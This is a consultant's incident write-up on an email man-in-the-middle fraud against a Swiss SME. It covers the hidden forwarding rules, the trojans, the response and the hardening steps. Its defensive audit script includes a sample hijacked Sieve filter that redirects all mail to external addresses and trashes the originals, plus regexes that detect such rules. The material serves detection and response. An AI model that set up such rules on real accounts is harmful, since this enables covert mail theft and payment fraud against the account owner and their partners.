Context: a client, an email, a vulnerability
d-side solutions manages the IT infrastructure of a Swiss SME active in distribution. This includes their domain name, hosting, and email configuration. One autumn morning in 2025, the client contacts us, worried: a supplier received an email seemingly from their address, requesting the cancellation of an order and a refund of CHF 7,000 to an unknown Italian IBAN.
🚨 Initial alert
A supplier receives an email requesting the cancellation of an order and a refund to a foreign bank account. The email is visually identical to those normally sent by our client.
Initially, we suspect classic spoofing — a sender forging the email address without actual access to the mailbox. But the reality proves far more serious.
Attack anatomy
After investigation, we discover it is not spoofing but an active man-in-the-middle (MITM) attack on the mail flow itself. The attacker does not send fake emails from outside: they receive the real ones as they arrive, modify them and send them on to the intended recipient, and the recipient's replies are diverted to them as well.
// Intercepted attack flow
Client (legitimate sender)  -->  Attacker (intercepts & modifies)  -->  Supplier (receives tampered version)
Client (receives nothing)   <--  Attacker (intercepts replies)     <--  Supplier (replies normally)
The attacker maintains two parallel conversations, unknown to both parties.
Intrusion vector: hidden forwarding rules
Analysis of the webmail account reveals two automatic forwarding rules created without the client's knowledge. Every incoming email was silently copied to two third-party Gmail addresses, and a companion filter moved the originals to the trash, so nothing ever appeared as read or redirected in the mailbox.
Trojan discovery
In parallel, we have the client's workstations scanned with several antivirus products. Several trojans are identified, presumably the source of the stolen webmail credentials, despite an active commercial antivirus.
⚠ Technical note
An active antivirus does not guarantee that every trojan is caught in real time. Modern malware uses packing, encryption and signature mutation to slip past the real-time engine, and is often only caught by a later full scan, by a second engine, or once signatures have been updated.
Incident response timeline
Day 0 — Detection
Alert from the defrauded supplier
The supplier contacts the client after receiving a suspicious email with an IBAN refund request. d-side solutions is immediately contacted.
Day 0 — Containment
Immediate password change
The password is changed. However, we discover that emails are still being intercepted: server-side forwarding rules belong to the account, not to the session, so they keep running after a password change, and the attacker no longer even needs to log in.
Day +1 — Investigation
Discovery of forwarding rules
Analysis of the Horde 5.2.x webmail account. Identification and immediate deletion of the two malicious forwarding rules and of the trash filter that hid the originals.
Day +2 — Workstation analysis
Multi-tool antivirus scan
Full analysis with Bitdefender + Malwarebytes on all Windows workstations. Discovery and cleanup of multiple trojans.
Following weeks — Hardening
Complete infrastructure hardening
Migration to modern webmail, 2FA activation, SPF/DKIM/DMARC verification, client training, mandatory phone verification for any IBAN change.
Technical analysis: why it worked
💡 Key point
SPF, DKIM and DMARC protect against external spoofing. They do not protect against an attacker who has legitimate access to the mailbox via stolen credentials. This is precisely what happened here.
The client was using Horde webmail version 5.2.x, an outdated version with known vulnerabilities. The attacker likely obtained credentials via the trojans on the workstations, then created the forwarding rules — a mundane, invisible action that persists even after a password change.
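To make the key point concrete, here is a small relaxed-alignment DMARC evaluator. It is an added example, not the client's setup or any mail library's code; the client domain (example.ch), the receiving host and the addresses are assumptions, and the two messages are constructed. A message the attacker sends through the compromised account arrives with the real server's SPF and DKIM results, so it passes; only a message injected from an outside server fails.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Two constructed messages as a receiver sees them after its SPF/DKIM checks
# (assumption: the client's domain is example.ch; hosts and addresses are invented).
VIA_COMPROMISED_ACCOUNT = """\
Authentication-Results: mx.supplier.example; spf=pass smtp.mailfrom=example.ch; dkim=pass header.d=example.ch
From: Accounting <accounting@example.ch>
To: orders@supplier.example
Subject: Order cancellation and refund

Please cancel the order and refund the amount to our new account.
"""

SPOOFED_FROM_OUTSIDE = """\
Authentication-Results: mx.supplier.example; spf=fail smtp.mailfrom=relay.bulk-sender.example; dkim=none
From: Accounting <accounting@example.ch>
To: orders@supplier.example
Subject: Order cancellation and refund

Please cancel the order and refund the amount to our new account.
"""


def org_domain(domain):
    """Organisational domain, simplified to the last two labels.
    Real DMARC uses the Public Suffix List; this is enough for the demonstration."""
    return ".".join(domain.lower().strip(".").split(".")[-2:])


def dmarc_evaluate(raw_message):
    """Relaxed-alignment DMARC verdict derived from the Authentication-Results header.
    Returns 'pass' if an SPF or DKIM pass is aligned with the From: domain, else 'fail'."""
    msg = message_from_string(raw_message)
    from_domain = org_domain(parseaddr(msg["From"])[1].rsplit("@", 1)[-1])
    results = msg.get("Authentication-Results", "")
    spf = re.search(r"spf=(\w+)(?:\s+smtp\.mailfrom=([^\s;]+))?", results)
    dkim = re.search(r"dkim=(\w+)(?:\s+header\.d=([^\s;]+))?", results)

    def aligned(match):
        # A pass only counts if the authenticated domain aligns with the visible From: domain.
        if not match or match.group(1) != "pass" or not match.group(2):
            return False
        return org_domain(match.group(2).rsplit("@", 1)[-1]) == from_domain

    return "pass" if aligned(spf) or aligned(dkim) else "fail"


if __name__ == "__main__":
    print("sent through the compromised mailbox:", dmarc_evaluate(VIA_COMPROMISED_ACCOUNT))
    print("spoofed from an outside relay:       ", dmarc_evaluate(SPOOFED_FROM_OUTSIDE))
```

Both messages carry the same From: header; the verdict differs only because the first one really left the client's own server. DMARC authenticates the domain, not the person at the keyboard.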
🚨 Critical lesson
Changing your password is not enough after a compromise. You must also audit the account and remove every filtering, forwarding and auto-transfer rule you did not create yourself.
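The following script illustrates that audit, for the hidden forwarding rules described in the intrusion section as well as for this lesson. It is an added example, not the client's script and not part of Horde. It assumes the webmail stores its filter rules as a Sieve script (the Horde filter module can use a Sieve backend; other backends keep rules in a database, in which case you would export them first). Both scripts and all addresses are constructed for the example.

```python
import re

# Constructed sample of a hijacked filter script, modelled on the pattern seen in
# this incident: copy everything out, hide the originals. Addresses are invented.
HIJACKED_SCRIPT = """
require ["fileinto", "copy"];
# Rule 1: silently copy every message to two external mailboxes
if true {
    redirect :copy "orders.copy.example@gmail.com";
    redirect :copy "backup.copy.example@gmail.com";
}
# Rule 2: hide the originals the attacker wants to answer himself
if header :contains "subject" ["order", "invoice", "refund"] {
    fileinto "Trash";
    stop;
}
"""

# A legitimate script that should produce no findings.
CLEAN_SCRIPT = """
require ["fileinto"];
if address :domain :is "from" "newsletter.example" {
    fileinto "Newsletters";
}
"""

OWN_DOMAINS = {"example.ch"}  # assumption: the organisation's own mail domains
HIDING_FOLDERS = {"trash", "deleted items", "junk", "spam"}

REDIRECT_RE = re.compile(r'\bredirect\b[^;]*?"([^"]+)"\s*;', re.IGNORECASE)
FILEINTO_RE = re.compile(r'\bfileinto\b[^;]*?"([^"]+)"\s*;', re.IGNORECASE)
DISCARD_RE = re.compile(r'\bdiscard\s*;', re.IGNORECASE)


def strip_noise(script):
    """Drop comments (# to end of line, /* ... */) and require declarations, which
    name commands inside strings. Does not handle '#' inside quoted strings."""
    script = re.sub(r"/\*.*?\*/", "", script, flags=re.DOTALL)
    script = re.sub(r"#[^\n]*", "", script)
    return re.sub(r"\brequire\b[^;]*;", "", script)


def audit_sieve(script, own_domains=OWN_DOMAINS):
    """Return (kind, detail) findings for actions that exfiltrate or conceal mail."""
    findings = []
    body = strip_noise(script)
    for m in REDIRECT_RE.finditer(body):
        target = m.group(1)
        domain = target.rsplit("@", 1)[-1].lower()
        if domain not in own_domains:
            findings.append(("external_redirect", target))
        if ":copy" not in m.group(0).lower():
            # Without :copy the redirect is the final delivery: the original vanishes.
            findings.append(("redirect_consumes_original", target))
    for m in FILEINTO_RE.finditer(body):
        folder = m.group(1)
        if folder.lower() in HIDING_FOLDERS:
            findings.append(("hidden_in_folder", folder))
    if DISCARD_RE.search(body):
        findings.append(("discard", "discard"))
    return findings


def risk_level(findings):
    """Rate the findings: a copy going out plus the original disappearing is the
    combination that kept this attack invisible to the victim."""
    kinds = {kind for kind, _ in findings}
    exfiltrates = "external_redirect" in kinds
    conceals = bool(kinds & {"hidden_in_folder", "discard", "redirect_consumes_original"})
    if exfiltrates and conceals:
        return "critical"
    if exfiltrates:
        return "high"
    if conceals:
        return "medium"
    return "ok"


if __name__ == "__main__":
    for name, script in (("hijacked", HIJACKED_SCRIPT), ("clean", CLEAN_SCRIPT)):
        found = audit_sieve(script)
        print(f"{name}: {risk_level(found)} {found}")
```

On a Dovecot/Pigeonhole server the per-user scripts can be exported with `doveadm sieve list -u <user>` and `doveadm sieve get -u <user> <script>` and fed to audit_sieve across every mailbox, not just the one that raised the alert; a mailbox with an external redirect the owner cannot explain is a compromise until proven otherwise.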
Remediation measures implemented
- ✓Removed malicious rules — forwarding and trash filter immediately deleted.
- ✓Password rotation — all email and application passwords changed.
- ✓Cleaned infected workstations — all trojans removed, systems and antivirus updated.
- ✓2FA activation — on email and all critical services.
- ✓Migrated to secure webmail — replaced obsolete Horde interface.
- ✓Filed report with NCSC — formal incident report submitted to Swiss National Cyber Security Centre.
- ✓Out-of-band procedure — any bank detail change now requires phone confirmation.
How to prevent this type of attack
Use an up-to-date webmail, enable SPF, DKIM, DMARC and 2FA, regularly audit forwarding and filtering rules on email accounts, and perform regular full antivirus scans. On the organizational side: establish an out-of-band procedure for bank detail changes and train your staff.
Swiss legal framework: your options
In Switzerland, this type of attack falls under several articles of the Criminal Code:
⚖ Swiss Criminal Code (SCC)
Art. 143bis SCC — Unauthorized access to a data processing system: up to 3 years.
Art. 143 SCC — Unauthorized obtaining of data: up to 5 years.
Art. 179novies SCC — Unauthorized obtaining of personal data: up to 1 year.
Summary
A man-in-the-middle attack on email is not reserved for large corporations. Swiss SMEs are prime targets precisely because they have established trust relationships with partners, significant transaction amounts, and sometimes less well-maintained systems.
Beyond the direct financial loss — which was limited in this case — the real danger lies in the reputational damage. When your business partners receive fraudulent emails that appear to come from your address, it's the trust built over years that's put at stake. Restoring that credibility takes far longer than cleaning up a mailbox.
In this case, an up-to-date webmail and 2FA activation would have significantly reduced the attack surface. The rapid response by d-side solutions helped contain the incident and initiate appropriate legal proceedings.
If you think your professional email may be compromised, or want to have your email security audited, contact us.
Luc Demierre
Founder & IT Consultant — d-side solutions Sàrl, Fribourg
Specialized in IT architecture, systems security and e-commerce integration for Swiss SMEs. Founder of d-side solutions Sàrl since 2022.